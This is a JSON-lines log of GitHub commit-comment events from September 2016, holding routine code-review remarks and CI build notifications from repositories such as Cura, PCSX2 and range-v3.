{"id":"4567406619","type":"CommitCommentEvent","actor":{"login":"ewjoachim"},"repo":{"name":"beautifuldjango/beautifuldjango.github.io"},"payload":{"comment":{"id":19034117,"position":null,"line":null,"path":null,"commit_id":"44df09f622ccba015bc383e3f91ee9912b44d960","created_at":"2016-09-15T10:59:37Z","updated_at":"2016-09-15T10:59:37Z","body":"HAAAAAAAAAAAAANDS"}},"created_at":"2016-09-15T10:59:37Z"}
{"id":"4567409275","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19034126,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-15T11:00:20Z","updated_at":"2016-09-15T11:00:20Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.168](http://build.clear-measure.com/viewLog.html?buildId=10453&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-15T11:00:20Z"}
{"id":"4567410348","type":"CommitCommentEvent","actor":{"login":"FBerendsen"},"repo":{"name":"kaspermarstal/SuperElastix"},"payload":{"comment":{"id":19034129,"position":null,"line":null,"path":null,"commit_id":"7ca133d888ae89ad0e7e85ed85b33cce03e6c7e7","created_at":"2016-09-15T11:00:33Z","updated_at":"2016-09-15T11:00:33Z","body":"And if you don't like the style, we can review the style settings in selxUncrustify.cfg"}},"created_at":"2016-09-15T11:00:33Z"}
{"id":"4567411883","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19034132,"position":null,"line":null,"path":null,"commit_id":"9effa4c9c69bd0bf38cee9528e0fc72fe213e51d","created_at":"2016-09-15T11:00:51Z","updated_at":"2016-09-15T11:00:51Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/462/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T11:00:51Z"}
{"id":"4567412901","type":"CommitCommentEvent","actor":{"login":"sangeetshah"},"repo":{"name":"amejiarosario/todoAPIjs"},"payload":{"comment":{"id":19034135,"position":null,"line":null,"path":null,"commit_id":"ebf20f4093aa20c867777b4b3db825429b54a20d","created_at":"2016-09-15T11:01:07Z","updated_at":"2016-09-15T11:01:07Z","body":"sss"}},"created_at":"2016-09-15T11:01:07Z"}
{"id":"4567413218","type":"CommitCommentEvent","actor":{"login":"FlatOutPS2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19034137,"position":null,"line":null,"path":null,"commit_id":"de480ec0f5d5bc36a87587c08b9bb7dbd584889f","created_at":"2016-09-15T11:01:12Z","updated_at":"2016-09-15T11:01:12Z","body":"Wait a sec, the shadow is fine in the screenshot you posted..."}},"created_at":"2016-09-15T11:01:12Z"}
{"id":"4567413723","type":"CommitCommentEvent","actor":{"login":"Geek-Lee"},"repo":{"name":"Geek-Lee/flasky"},"payload":{"comment":{"id":19034139,"position":9,"line":10,"path":"templates/base.html","commit_id":"7edcb4ccb97f35c40675d51ea78c123beb61774b","created_at":"2016-09-15T11:01:20Z","updated_at":"2016-09-15T11:01:20Z","body":"插入bootstrap/base.html 中的head代码，首先先super（）保留基模板中定义的块的原始内容。"}},"created_at":"2016-09-15T11:01:20Z"}
{"id":"4567419426","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":19034151,"position":8,"line":8,"path":"wk3/JSON-Error-Exercise.js","commit_id":"56bd6680ca29f03ae07b88ce7782d78216a7cb1b","created_at":"2016-09-15T11:02:40Z","updated_at":"2016-09-15T11:02:40Z","body":"you are throwing a string here but should throw an error object with a message"}},"created_at":"2016-09-15T11:02:40Z"}
{"id":"4567419511","type":"CommitCommentEvent","actor":{"login":"bjansen"},"repo":{"name":"ceylon/ceylon-ide-intellij"},"payload":{"comment":{"id":19034152,"position":36,"line":262,"path":"jps-plugin/src/org/intellij/plugins/ceylon/jps/CeylonBuilder.java","commit_id":"16e5f0355fde128950d676348325ff30355074b1","created_at":"2016-09-15T11:02:41Z","updated_at":"2016-09-15T11:02:41Z","body":"I was already using repositories from the config, so nothing has really changed."}},"created_at":"2016-09-15T11:02:41Z"}
{"id":"4567419778","type":"CommitCommentEvent","actor":{"login":"Clarity-89"},"repo":{"name":"sergei-maertens/django-ponyjs"},"payload":{"comment":{"id":19034154,"position":42,"line":64,"path":"src/ponyjs/models/base.js","commit_id":"b9294b0c5419ef0a25974402aea5aa509e2fef41","created_at":"2016-09-15T11:02:45Z","updated_at":"2016-09-15T11:02:45Z","body":"Hah, indeed it would! Didn't even think about that one. "}},"created_at":"2016-09-15T11:02:45Z"}
{"id":"4567421553","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19034158,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-15T11:03:13Z","updated_at":"2016-09-15T11:03:13Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.168](http://build.clear-measure.com/viewLog.html?buildId=10453&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:52"}},"created_at":"2016-09-15T11:03:13Z"}
{"id":"4567424602","type":"CommitCommentEvent","actor":{"login":"Shestak"},"repo":{"name":"Shestak/ShestakUI"},"payload":{"comment":{"id":19034166,"position":null,"line":null,"path":null,"commit_id":"64d282b8e87b88430c605f60b335aad27bcdeb47","created_at":"2016-09-15T11:03:58Z","updated_at":"2016-09-15T11:03:58Z","body":"А разница только в потребляемой памяти? "}},"created_at":"2016-09-15T11:03:58Z"}
{"id":"4567424877","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19034167,"position":null,"line":null,"path":null,"commit_id":"0dac9af20af117b88d31addc4f1eec77f22f7498","created_at":"2016-09-15T11:04:01Z","updated_at":"2016-09-15T11:04:01Z","body":"Thanks for answering. I was just wondering the need for it in this specific _FileUtil.java_\r\n"}},"created_at":"2016-09-15T11:04:01Z"}
{"id":"4567425406","type":"CommitCommentEvent","actor":{"login":"IntelOrca"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":19034169,"position":5,"line":262,"path":"src/world/sprite.c","commit_id":"318adc3fa83d98945297521589d4d32bdc41bc2a","created_at":"2016-09-15T11:04:10Z","updated_at":"2016-09-15T11:04:10Z","body":"These bl flags need naming too"}},"created_at":"2016-09-15T11:04:10Z"}
{"id":"4567425716","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":19034171,"position":18,"line":18,"path":"wk3/JSON-Error-Exercise.js","commit_id":"56bd6680ca29f03ae07b88ce7782d78216a7cb1b","created_at":"2016-09-15T11:04:15Z","updated_at":"2016-09-15T11:04:15Z","body":"interesting. why are you doing this instead of decreasing the number by one?"}},"created_at":"2016-09-15T11:04:15Z"}
{"id":"4567426218","type":"CommitCommentEvent","actor":{"login":"henri-hulski"},"repo":{"name":"morepath/reg"},"payload":{"comment":{"id":19034174,"position":null,"line":null,"path":null,"commit_id":"92ddf5d02e9bdf02ab900a96560905bce89f324b","created_at":"2016-09-15T11:04:22Z","updated_at":"2016-09-15T11:04:22Z","body":"I think @taschini is mainly about removing the `#noqa` here. \r\nNot sure if it is worth."}},"created_at":"2016-09-15T11:04:22Z"}
{"id":"4567427034","type":"CommitCommentEvent","actor":{"login":"Dokman"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19034177,"position":null,"line":null,"path":null,"commit_id":"de480ec0f5d5bc36a87587c08b9bb7dbd584889f","created_at":"2016-09-15T11:04:36Z","updated_at":"2016-09-15T11:04:36Z","body":"okay... then is all working okay no?"}},"created_at":"2016-09-15T11:04:36Z"}
{"id":"4567427207","type":"CommitCommentEvent","actor":{"login":"dumblob"},"repo":{"name":"daokoder/dao"},"payload":{"comment":{"id":19034178,"position":558,"line":1035,"path":"kernel/daoStdtype.c","commit_id":"e1dc975e1fa0b436d8d506f9ff268b5a90a1f527","created_at":"2016-09-15T11:04:38Z","updated_at":"2016-09-15T11:04:38Z","body":"I'm not sure, but the comparison `>= -0.0` is IMHO not reliable across different compilers. I would suggest using C99 built-in function `signbit()`."}},"created_at":"2016-09-15T11:04:38Z"}
{"id":"4567427442","type":"CommitCommentEvent","actor":{"login":"pipping"},"repo":{"name":"jcbeaudoin/MKCL"},"payload":{"comment":{"id":19034179,"position":49,"line":49,"path":"src/git_describe_this_mkcl.sh","commit_id":"fc50d0038f2f1579fbb7c6ae930c1d111448346e","created_at":"2016-09-15T11:04:42Z","updated_at":"2016-09-15T11:04:42Z","body":"This could also be achieved without depending on `sed` like this: `version_release=${version_tag#v}; version_release=${version_release//_/.}` (none of the current tags contain underscores, though, so that the second half is superfluous, no?)"}},"created_at":"2016-09-15T11:04:42Z"}
{"id":"4567427915","type":"CommitCommentEvent","actor":{"login":"davidfestal"},"repo":{"name":"ceylon/ceylon-ide-intellij"},"payload":{"comment":{"id":19034181,"position":36,"line":262,"path":"jps-plugin/src/org/intellij/plugins/ceylon/jps/CeylonBuilder.java","commit_id":"16e5f0355fde128950d676348325ff30355074b1","created_at":"2016-09-15T11:04:49Z","updated_at":"2016-09-15T11:04:49Z","body":"probably, but you should still test the use-case I explain here, since it seems there might be a bug preventing the compilation of dependent projects, which would be weird IMO.\r\nThis change will have made it harder to fix this dependent-projects bug."}},"created_at":"2016-09-15T11:04:49Z"}
{"id":"4567430029","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":19034189,"position":2,"line":2,"path":"wk3/JSON-Error-Exercise.js","commit_id":"56bd6680ca29f03ae07b88ce7782d78216a7cb1b","created_at":"2016-09-15T11:05:22Z","updated_at":"2016-09-15T11:05:22Z","body":"it doesn't looks like this argument gets used."}},"created_at":"2016-09-15T11:05:22Z"}
{"id":"4567430279","type":"CommitCommentEvent","actor":{"login":"Maryana87"},"repo":{"name":"Maryana87/MA"},"payload":{"comment":{"id":19034190,"position":null,"line":null,"path":null,"commit_id":"ae8dcae23acdf15cc66733340e63ea0b2a640147","created_at":"2016-09-15T11:05:25Z","updated_at":"2016-09-15T11:05:25Z","body":"<!DOCTYPE HTML>\r\n<html>\r\n<head>\r\n"}},"created_at":"2016-09-15T11:05:25Z"}
{"id":"4567432489","type":"CommitCommentEvent","actor":{"login":"henri-hulski"},"repo":{"name":"morepath/reg"},"payload":{"comment":{"id":19034195,"position":null,"line":null,"path":null,"commit_id":"92ddf5d02e9bdf02ab900a96560905bce89f324b","created_at":"2016-09-15T11:05:58Z","updated_at":"2016-09-15T11:05:58Z","body":"And the `# pragma: no cover`, of course. "}},"created_at":"2016-09-15T11:05:58Z"}
{"id":"4567435133","type":"CommitCommentEvent","actor":{"login":"fladd"},"repo":{"name":"expyriment/expyriment"},"payload":{"comment":{"id":19034201,"position":null,"line":null,"path":null,"commit_id":"6f20786634b519aea439fbabefa2add968f8185e","created_at":"2016-09-15T11:06:30Z","updated_at":"2016-09-15T11:06:30Z","body":"Yes it was. I was playing around with automatically building the documentation on readthedocs.io. The existence of the file should not affect anything else."}},"created_at":"2016-09-15T11:06:30Z"}
{"id":"4567436656","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":19034203,"position":null,"line":null,"path":null,"commit_id":"845790f8368ea085e0f79d3beefad5009683f0c4","created_at":"2016-09-15T11:06:49Z","updated_at":"2016-09-15T11:06:49Z","body":"looks good to me!"}},"created_at":"2016-09-15T11:06:49Z"}
{"id":"4567439062","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19034204,"position":16,"line":254,"path":"src/utils/linearAlg2D.h","commit_id":"4f073ab23f9129761a37afd01fda427c1cb357a7","created_at":"2016-09-15T11:07:27Z","updated_at":"2016-09-15T11:07:27Z","body":"In other places, you've used `ab`."}},"created_at":"2016-09-15T11:07:27Z"}
{"id":"4567446406","type":"CommitCommentEvent","actor":{"login":"pipping"},"repo":{"name":"jcbeaudoin/MKCL"},"payload":{"comment":{"id":19034244,"position":33,"line":33,"path":"src/git_describe_this_mkcl.sh","commit_id":"fc50d0038f2f1579fbb7c6ae930c1d111448346e","created_at":"2016-09-15T11:09:18Z","updated_at":"2016-09-15T11:09:18Z","body":"I left my comment in the wrong place: This could also be done via `git rev-parse --abbrev-ref HEAD`."}},"created_at":"2016-09-15T11:09:18Z"}
{"id":"4567446564","type":"CommitCommentEvent","actor":{"login":"bucbowie"},"repo":{"name":"bucbowie/Picars"},"payload":{"comment":{"id":19034249,"position":null,"line":null,"path":null,"commit_id":"0fd6d05eb16474ba37e9dcbae89e18460dbba752","created_at":"2016-09-15T11:09:20Z","updated_at":"2016-09-15T11:09:20Z","body":"Does not play well with OSMC. I built this on Raspbian wheezy and the jessie version currently does NOT support Kodi using apt-get install kodi. So if you load this on OSMC, the graphics are corrupted and displays incorrectly. Might give a poor impression. So, load this on a Raspberry PI 2 or wait for Kodi to be supporte on the Jessie build for the Raspberry Pi 3."}},"created_at":"2016-09-15T11:09:20Z"}
{"id":"4567447320","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-interactive-video"},"payload":{"comment":{"id":19034277,"position":17,"line":179,"path":"upgrades.js","commit_id":"befbb7ae4769de826f14232a0eab1d6bb470df80","created_at":"2016-09-15T11:09:31Z","updated_at":"2016-09-15T11:09:31Z","body":"i implicitly declared"}},"created_at":"2016-09-15T11:09:31Z"}
{"id":"4567449283","type":"CommitCommentEvent","actor":{"login":"xulaus"},"repo":{"name":"Rambatino/CHAID"},"payload":{"comment":{"id":19034311,"position":6,"line":341,"path":"CHAID/CHAID.py","commit_id":"cdd4c8174f0f2be5c2d89dbb7f7f2f83aadcc2d0","created_at":"2016-09-15T11:10:00Z","updated_at":"2016-09-15T11:10:00Z","body":"I was wrong about the not none comparison, so this was  probably better before"}},"created_at":"2016-09-15T11:10:00Z"}
{"id":"4567453603","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19034317,"position":8,"line":155,"path":"src/support.cpp","commit_id":"700ce8ef3b4f6037f99ba472bd5b8d3186fddd04","created_at":"2016-09-15T11:11:05Z","updated_at":"2016-09-15T11:11:05Z","body":"fixed\r\n\r\nIt's only used to determine the support smoothing..."}},"created_at":"2016-09-15T11:11:05Z"}
{"id":"4567457537","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19034323,"position":16,"line":2492,"path":"resources/definitions/fdmprinter.def.json","commit_id":"750018003d6d43e346c4aba14767179a3a66890d","created_at":"2016-09-15T11:12:08Z","updated_at":"2016-09-15T11:12:08Z","body":"I don't understand.\r\nThe setting has been removed. Does the version upgrade system need a special case for that? Why can't it see for itself that the setting doesn't exist any more?"}},"created_at":"2016-09-15T11:12:08Z"}
{"id":"4567458072","type":"CommitCommentEvent","actor":{"login":"bucbowie"},"repo":{"name":"bucbowie/Picars"},"payload":{"comment":{"id":19034324,"position":9,"line":9,"path":"README.md","commit_id":"0fd6d05eb16474ba37e9dcbae89e18460dbba752","created_at":"2016-09-15T11:12:15Z","updated_at":"2016-09-15T11:12:15Z","body":"Does not play well with OSMC. I built this on Raspbian wheezy and the jessie version currently does NOT support Kodi using apt-get install kodi. So if you load this on OSMC, the graphics are corrupted and displays incorrectly. Might give a poor impression. So, load this on a Raspberry PI 2 or wait for Kodi to be supporte on the Jessie build for the Raspberry Pi 3."}},"created_at":"2016-09-15T11:12:15Z"}
{"id":"4567460752","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"racket/racket"},"payload":{"comment":{"id":19034335,"position":15,"line":314,"path":"pkgs/racket-doc/xml/xml.scrbl","commit_id":"38622ce2767a36920c34b4b196d49fbbcca1b41d","created_at":"2016-09-15T11:12:55Z","updated_at":"2016-09-15T11:12:55Z","body":"It would make racket-doc require web-server-doc which would force that package to go to a weird place in the dependency tree"}},"created_at":"2016-09-15T11:12:55Z"}
{"id":"4567462297","type":"CommitCommentEvent","actor":{"login":"xeolabs"},"repo":{"name":"xeolabs/scenejs"},"payload":{"comment":{"id":19034338,"position":493,"line":17780,"path":"api/latest/scenejs.js","commit_id":"e6a3a2bb6f05930fd986a7dcccb677339cd3e21c","created_at":"2016-09-15T11:13:20Z","updated_at":"2016-09-15T11:13:20Z","body":"@mullerlele Now fixed in master."}},"created_at":"2016-09-15T11:13:20Z"}
{"id":"4567462921","type":"CommitCommentEvent","actor":{"login":"maximilianhuber"},"repo":{"name":"fossology/fossology"},"payload":{"comment":{"id":19034340,"position":6,"line":10,"path":"install/db/dbcreate.in","commit_id":"17254b98da95a8448b3e541c974e119b5558b139","created_at":"2016-09-15T11:13:28Z","updated_at":"2016-09-15T11:13:28Z","body":"@fh1ch: why have you added this lines? which part of the code does now init the external database?\r\n\r\nI am thinking about removing this part and modifying the lines below to work with external databases.\r\n\r\n--\r\n\r\nThis comment is related to discussions on PR #697"}},"created_at":"2016-09-15T11:13:28Z"}
{"id":"4567467250","type":"CommitCommentEvent","actor":{"login":"gnzlbg"},"repo":{"name":"ericniebler/range-v3"},"payload":{"comment":{"id":19034348,"position":42,"line":316,"path":"include/range/v3/detail/config.hpp","commit_id":"4cfcb59c3db1c279d72c64ccf15de3c724a0362d","created_at":"2016-09-15T11:14:35Z","updated_at":"2016-09-15T11:14:35Z","body":"> AFAIU inline variables don't really provide new functionality.\r\n\r\nIIUC they do provide new functionality with respect to `static_const<T>::value` if the object being constructed doesn't have a `constexpr` constructor or has side-effects, but this is beyond the point since range-v3 doesn't use this. \r\n\r\nThis commit was one of the first usages of inline variables \"in the real world\", it discovered an incompatibility with C++<=14 which broke clang's initial implementation, which is now fixed and shipped in clang 3.9, and which will hopefully help in getting GCC and MSVC implementations to be correct as well. It also discovered the need to put the inline variable in an `inline namespace` which is... really unfortunate.\r\n\r\nWas this worth it? It was worth it for me, since I learned something I did not know before and I am now able to use them in my own projects (without the macro) because clang supports them properly.\r\n\r\nWas this worth it for range-v3? In retrospect, I don't think so. While there are gains on paper (each TU doesn't need to instantiate all those little `static_const<T>` anymore), I doubt they are measurable."}},"created_at":"2016-09-15T11:14:35Z"}
{"id":"4567467262","type":"CommitCommentEvent","actor":{"login":"gauravmak"},"repo":{"name":"laravel/docs"},"payload":{"comment":{"id":19034349,"position":null,"line":null,"path":null,"commit_id":"96045517e74b90ac2441e4c8f595229e8c34ab4b","created_at":"2016-09-15T11:14:35Z","updated_at":"2016-09-15T11:14:35Z","body":"@taylorotwell I am curious what would be the benefit of importing full class instead of the assigned alias?"}},"created_at":"2016-09-15T11:14:35Z"}
{"id":"4567470124","type":"CommitCommentEvent","actor":{"login":"syshtml"},"repo":{"name":"syshtml/first-time"},"payload":{"comment":{"id":19034353,"position":null,"line":null,"path":null,"commit_id":"eef3813b0c671533f453579ba0673c8f53bf098d","created_at":"2016-09-15T11:15:19Z","updated_at":"2016-09-15T11:15:19Z","body":"# first-time\r\n\r\nmy first repozitory on Git ... bla...bla...bla\r\n\r\nI like :hacking: :sniffing: and :money:.\r\n"}},"created_at":"2016-09-15T11:15:19Z"}
{"id":"4567472654","type":"CommitCommentEvent","actor":{"login":"jackha"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19034358,"position":15,"line":245,"path":"resources/qml/SidebarHeader.qml","commit_id":"4d84584f599078b0c3c3aacfb8e2bf532f3f8c7c","created_at":"2016-09-15T11:15:56Z","updated_at":"2016-09-15T11:15:56Z","body":"Or you can do: return data == \"False\""}},"created_at":"2016-09-15T11:15:56Z"}
{"id":"4567473176","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"bigmickeystyle/wk3"},"payload":{"comment":{"id":19034360,"position":13,"line":13,"path":"thursday1_askForNumber.js","commit_id":"77074bbc6c8cb344de5402a2c369a580e0aa2ad0","created_at":"2016-09-15T11:16:05Z","updated_at":"2016-09-15T11:16:05Z","body":"it might have been easier to make an array here and to adjust the number before getting its value. but this can also be justified since it's more like a dictionary this way."}},"created_at":"2016-09-15T11:16:05Z"}
{"id":"4567473599","type":"CommitCommentEvent","actor":{"login":"AlexandreDecan"},"repo":{"name":"maelick/deps-analysis"},"payload":{"comment":{"id":19034361,"position":null,"line":null,"path":null,"commit_id":"8f93b91295d9936d4c02a80fa57e857f10e721ff","created_at":"2016-09-15T11:16:12Z","updated_at":"2016-09-15T11:16:12Z","body":"En quoi consiste cette mise à jour ? \r\nEst-ce que les données des packages n'étaient pas valides/complètes ?"}},"created_at":"2016-09-15T11:16:12Z"}
{"id":"4567476783","type":"CommitCommentEvent","actor":{"login":"Warrior-"},"repo":{"name":"Shestak/ShestakUI"},"payload":{"comment":{"id":19034380,"position":null,"line":null,"path":null,"commit_id":"64d282b8e87b88430c605f60b335aad27bcdeb47","created_at":"2016-09-15T11:16:58Z","updated_at":"2016-09-15T11:16:58Z","body":"ну я не думаю что из-за увеличения значений дебаффов память будет потребляться больше)"}},"created_at":"2016-09-15T11:16:58Z"}
{"id":"4567476970","type":"CommitCommentEvent","actor":{"login":"skylinezx"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19034383,"position":null,"line":null,"path":null,"commit_id":"6fb5b345dddf38410ea0095fce4a27e24684b1e2","created_at":"2016-09-15T11:17:01Z","updated_at":"2016-09-15T11:17:01Z","body":"thx u"}},"created_at":"2016-09-15T11:17:01Z"}
{"id":"4567478606","type":"CommitCommentEvent","actor":{"login":"jandersson"},"repo":{"name":"payberah/id2221"},"payload":{"comment":{"id":19034393,"position":4,"line":346,"path":"lab1/lab1.md","commit_id":"dbffaa08aa952cbd80b2a2b9153dde4c0030cd70","created_at":"2016-09-15T11:17:26Z","updated_at":"2016-09-15T11:17:26Z","body":"I noticed this was removed, is it still OK to use this method?"}},"created_at":"2016-09-15T11:17:26Z"}
{"id":"4567479745","type":"CommitCommentEvent","actor":{"login":"julienlancelot"},"repo":{"name":"SonarSource/sonarqube"},"payload":{"comment":{"id":19034395,"position":31,"line":58,"path":"server/sonar-web/src/main/webapp/WEB-INF/app/models/property.rb","commit_id":"77bd719aedd53e98d72ea00a656773fe7e0a4e48","created_at":"2016-09-15T11:17:42Z","updated_at":"2016-09-15T11:17:42Z","body":"If resource_id is passed as a string, then it will not be cast by rails. \".to_i\" convert the string as an number (it will work for long)"}},"created_at":"2016-09-15T11:17:42Z"}
{"id":"4567482419","type":"CommitCommentEvent","actor":{"login":"jackha"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19034401,"position":12,"line":243,"path":"resources/qml/SidebarHeader.qml","commit_id":"ec587eb0dd76aa88178c6f923e94c08ab09b0ae2","created_at":"2016-09-15T11:18:21Z","updated_at":"2016-09-15T11:18:21Z","body":"return (data == \"False\")"}},"created_at":"2016-09-15T11:18:21Z"}
{"id":"4567484044","type":"CommitCommentEvent","actor":{"login":"ssbn-412-42"},"repo":{"name":"ssbn-412-42/Leaning"},"payload":{"comment":{"id":19034403,"position":null,"line":null,"path":null,"commit_id":"45f0bfb3f001b7c6e816e837a31ada10c82cff7c","created_at":"2016-09-15T11:18:45Z","updated_at":"2016-09-15T11:18:45Z","body":"强迫症犯了，必须整理文件夹！"}},"created_at":"2016-09-15T11:18:45Z"}
{"id":"4567488055","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-editor-interactive-video"},"payload":{"comment":{"id":19034410,"position":4,"line":567,"path":"Scripts/interactive-video-editor.js","commit_id":"4d9565375c0c13388faedd56dd060ca519eab152","created_at":"2016-09-15T11:19:42Z","updated_at":"2016-09-15T11:19:42Z","body":"This does not seem to be working, parameters.visuals are already defined at this point from default values"}},"created_at":"2016-09-15T11:19:42Z"}
{"id":"4567489186","type":"CommitCommentEvent","actor":{"login":"jackha"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19034412,"position":31,"line":491,"path":"plugins/XmlMaterialProfile/XmlMaterialProfile.py","commit_id":"d68f6a4e9a2bb01e4fe1cd6f086aa7c1705ecf87","created_at":"2016-09-15T11:19:59Z","updated_at":"2016-09-15T11:19:59Z","body":"FYI: This broke serialize a few days ago, because a bool could not be serialized. Is fixed by now."}},"created_at":"2016-09-15T11:19:59Z"}
{"id":"4567489450","type":"CommitCommentEvent","actor":{"login":"GavriYashar"},"repo":{"name":"GavriYashar/Matlab-Editor-Plugin"},"payload":{"comment":{"id":19034413,"position":null,"line":null,"path":null,"commit_id":"beeefbb2db656fada78c364efa465411c1632263","created_at":"2016-09-15T11:20:03Z","updated_at":"2016-09-15T11:20:03Z","body":"#6 "}},"created_at":"2016-09-15T11:20:03Z"}
{"id":"4567489664","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19034414,"position":14,"line":40,"path":"src/SkirtBrim.cpp","commit_id":"dc97b5f312b3537976d048269d191ddefecfe5ec","created_at":"2016-09-15T11:20:08Z","updated_at":"2016-09-15T11:20:08Z","body":"To illustrate:\r\n\r\n    ──────v──────\r\n    ──────v──────\r\n    ────┐ ░ ┌────\r\n    ──┐ │ ░ │ ┌──\r\n    █ │ │ ░ │ │ █\r\n    ──┘ │ ░ │ └──\r\n    ────┘ ░ └────\r\n    ──────^──────\r\n    ──────^──────\r\n\r\n░ = Possible room for support."}},"created_at":"2016-09-15T11:20:08Z"}
{"id":"4567492196","type":"CommitCommentEvent","actor":{"login":"jagare"},"repo":{"name":"arthur-xavier/purescript-pux-todomvc"},"payload":{"comment":{"id":19034424,"position":null,"line":null,"path":null,"commit_id":"631f34572ae9be7b5dcf2fef95cf86de9b3bd08a","created_at":"2016-09-15T11:20:44Z","updated_at":"2016-09-15T11:20:44Z","body":"package.json is not updated on purescript version. It is still 0.8.4!!!\r\nSo currently master doesn't build :-(\r\nI have tried the code with boilerplate from the latest pux starter app, https://github.com/alexmingoia/pux-starter-app\r\nAnd it worked OK after the needed small adjustments."}},"created_at":"2016-09-15T11:20:44Z"}
{"id":"4567493814","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"bigmickeystyle/wk3"},"payload":{"comment":{"id":19034425,"position":26,"line":26,"path":"thursday1_askForNumber.js","commit_id":"77074bbc6c8cb344de5402a2c369a580e0aa2ad0","created_at":"2016-09-15T11:21:09Z","updated_at":"2016-09-15T11:21:09Z","body":"this works, but doesn't make too much sense because you are throwing an error and then catching it in the same function. you could have just applied your error handling behavior where you threw the error.\r\nif you read the exercise again, you'll see that the error handling should happen in `translateNumeberToGerman`"}},"created_at":"2016-09-15T11:21:09Z"}
{"id":"4567494634","type":"CommitCommentEvent","actor":{"login":"jondeandres"},"repo":{"name":"rollbar/rollbar-gem"},"payload":{"comment":{"id":19034430,"position":null,"line":null,"path":null,"commit_id":"965d67bfeebf4d1596004668beed6d4431ed5b9a","created_at":"2016-09-15T11:21:20Z","updated_at":"2016-09-15T11:21:20Z","body":":+1: "}},"created_at":"2016-09-15T11:21:20Z"}
{"id":"4567494887","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19034435,"position":null,"line":null,"path":null,"commit_id":"de480ec0f5d5bc36a87587c08b9bb7dbd584889f","created_at":"2016-09-15T11:21:23Z","updated_at":"2016-09-15T11:21:23Z","body":"Yes there are fine. If you use the SW renderer (hit F9), you will see the difference."}},"created_at":"2016-09-15T11:21:23Z"}
{"id":"4567494964","type":"CommitCommentEvent","actor":{"login":"atvcaptain"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19034437,"position":null,"line":null,"path":null,"commit_id":"129f3be3e4220c43219e3e6e0ae76c753c7324b7","created_at":"2016-09-15T11:21:25Z","updated_at":"2016-09-15T11:21:25Z","body":"yes i have add to new branch nextp3 too its now default in oe-core\r\n"}},"created_at":"2016-09-15T11:21:25Z"}
{"id":"4567496551","type":"CommitCommentEvent","actor":{"login":"mullerlele"},"repo":{"name":"xeolabs/scenejs"},"payload":{"comment":{"id":19034442,"position":493,"line":17780,"path":"api/latest/scenejs.js","commit_id":"e6a3a2bb6f05930fd986a7dcccb677339cd3e21c","created_at":"2016-09-15T11:21:51Z","updated_at":"2016-09-15T11:21:51Z","body":"@xeolabs Thank you :-)"}},"created_at":"2016-09-15T11:21:51Z"}
{"id":"4567497828","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19034445,"position":null,"line":null,"path":null,"commit_id":"04d7481252bcbc900c30f7c462821e22e4cdb2dc","created_at":"2016-09-15T11:22:12Z","updated_at":"2016-09-15T11:22:12Z","body":"TeamCity test :: test [Build 14](http://ci.lemmew.com:8111/viewLog.html?buildId=1466&buildTypeId=Test_Test) is now running\n"}},"created_at":"2016-09-15T11:22:12Z"}
